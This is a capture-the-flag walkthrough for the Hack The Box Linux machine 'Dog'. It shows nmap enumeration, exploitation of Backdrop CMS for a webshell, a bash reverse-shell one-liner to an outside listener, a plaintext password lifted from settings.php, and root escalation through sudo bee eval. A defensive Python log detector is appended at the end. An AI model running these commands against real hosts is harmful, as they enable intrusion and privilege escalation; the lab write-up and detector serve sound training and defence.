Dog
Easy - Linux

Enumeration
Ports
nmap -p- --open -sCV --top-ports 500 10.10.11.58
###
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Websites

Classic Virtual Hosting dog.htb
Possible Usernames: dogBackDropSystem && Anonymous

The CMS is Backdrop

The login address is available -->

Hack the WebApp
User Enumeration


With it we can see that the user dogBackDropSystem is available. Okay, now we search for information about exploits for Backdrop CMS 1.27.1
Exploit Database

Nice! So now download it and execute the script -->


WebShell
NICE! Now create a reverse shell and put a netcat listener on any port -->
nc -nvlp 1234
##
bash -c 'bash -i >& /dev/tcp/10.10.14.246/1234 0>&1'

I do my TTY treatment -->
script /dev/null -c bash
Ctrl+z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 45 columns 184 ## laptop screen dimensions
In the web path there is a file named settings.php, and inside it we can read a password:
First Climb


johncusack:BackDropJ2024DS2024
Now I list the current users on this machine -->

And I try to su, and we are in -->

Root Climb
With that, check the sudo permissions -->

We can see that this user can run bee with all permissions, so...
After investigating, I found an eval function with which we can execute commands -->


sudo /usr/local/bin/bee --root=/var/www/html eval 'system("cat /root/root.txt");'
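
From the defender's side, the sudo call above leaves a record in the auth log. The following is an added example, not part of the original writeup, that flags bee eval run as root through sudo. The log lines, hostname and timestamps are constructed, and the parser assumes the --option=value form used above.

```python
import re
import shlex

# sudo's standard log record: "<user> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
BEE_PATH = "/usr/local/bin/bee"    # path taken from the writeup
CODE_EXEC_SUBCOMMANDS = {"eval"}   # subcommand seen in the writeup; extend as needed


def bee_subcommand(command):
    """Return the first non-option argument of a bee command line, or None."""
    try:
        argv = shlex.split(command)
    except ValueError:             # unbalanced quotes in logged PHP: plain split
        argv = command.split()
    if not argv or argv[0] != BEE_PATH:
        return None
    for arg in argv[1:]:
        if not arg.startswith("-"):    # skip options such as --root=/var/www/html
            return arg
    return None


def find_bee_eval(lines):
    """Return (user, command) for sudo records where bee ran code as root."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        if bee_subcommand(m.group("cmd")) in CODE_EXEC_SUBCOMMANDS:
            hits.append((m.group("user"), m.group("cmd")))
    return hits


# Constructed sample lines in auth.log format (not captured from the box).
SAMPLE_LOG = [
    'Mar  9 10:01:02 dog sudo: johncusack : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/local/bin/bee --root=/var/www/html cache-clear all',
    'Mar  9 10:02:11 dog sudo: johncusack : TTY=pts/0 ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/local/bin/bee --root=/var/www/html eval echo "ok";',
    'Mar  9 10:03:40 dog sudo: johncusack : TTY=pts/0 ; PWD=/tmp ; USER=www-data ; COMMAND=/usr/local/bin/bee --root=/var/www/html eval echo 1;',
    'Mar  9 10:04:05 dog sshd[812]: Accepted password for johncusack from 10.0.0.5 port 50022 ssh2',
]

if __name__ == "__main__":
    for user, cmd in find_bee_eval(SAMPLE_LOG):
        print(f"ALERT: {user} ran bee code execution as root: {cmd}")
```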
